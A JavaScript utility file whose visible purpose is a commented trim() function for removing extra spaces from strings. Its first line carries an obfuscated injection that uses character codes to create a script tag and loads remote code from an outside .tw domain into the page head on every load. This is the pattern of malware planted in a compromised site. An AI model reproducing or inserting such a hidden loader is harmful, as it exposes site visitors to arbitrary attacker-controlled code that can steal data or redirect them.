Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,102,111,114,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();function trim(inputString) 
{
    // Removes leading and trailing spaces from the passed string. Also removes
	// consecutive spaces and replaces it with one space. If something besides
	// a string is passed in (null, custom object, etc.) then return the input.
	  
	if (typeof inputString != "string") 
	{ 
		return inputString; 
	}
	var retValue = inputString;
	
	// Check for spaces at the beginning of the string
	var ch = retValue.substring(0, 1);
	while (ch == " ") {
		retValue = retValue.substring(1, retValue.length);
	    ch = retValue.substring(0, 1);
	}
	// Check for spaces at the end of the string
	ch = retValue.substring(retValue.length-1, retValue.length);
    while (ch == " ") 
	{ 
		retValue = retValue.substring(0, retValue.length-1);
	    ch = retValue.substring(retValue.length-1, retValue.length);
	}
	
	// Note that there are two spaces in the string - look for multiple spaces within the string
	while (retValue.indexOf("  ") != -1) { 
	    retValue = retValue.substring(0, retValue.indexOf("  ")) + 
		           retValue.substring(retValue.indexOf("  ")+1, retValue.length); 
				   // Again, there are two spaces in each of the strings
	}
    return retValue; // Return the trimmed string back to the user
} 